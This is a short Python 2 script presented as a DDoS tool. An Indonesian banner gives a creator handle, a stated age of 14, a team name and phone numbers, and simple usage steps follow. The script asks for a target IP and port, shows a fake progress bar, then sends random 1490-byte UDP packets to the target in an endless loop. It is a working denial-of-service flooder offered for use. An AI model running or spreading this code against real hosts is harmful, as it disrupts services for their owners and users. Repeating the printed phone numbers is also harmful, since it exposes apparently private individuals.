import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############

os.system("clear")
print
print "Creator   : K3DU721/KHESA GANSSS"
print "Tools     : DDOS"
print "UMUR      : 14"
print "Kontak    : 0822-9753-8971" 
print "Team.     : FOX CYBER TEAM"
print "       NO RECORDED"
print "      SEMOGA SUKSES"
print "  GUA GANS PARAH KALIAN SEMUA JELEK"
print "   cara makenya: "
print " 1.Masukan Alamat Ip target"
print " 2.Masukan port"
print " 3.duduk manis ngopi"
print " Thank to mastah:ISAN/YATUN"
print " MAU NOMOR WANYA MASTAH GW/ISAN?BOLEH"
print " NIH NO NYA :0812-8540-5915"
print
ip = raw_input("IP Target : ")
port = input("Port       : ")

os.system("clear")
os.system("figlet Attack Starting")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip, port))
     sent = sent + 1
     port = port + 0
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 0
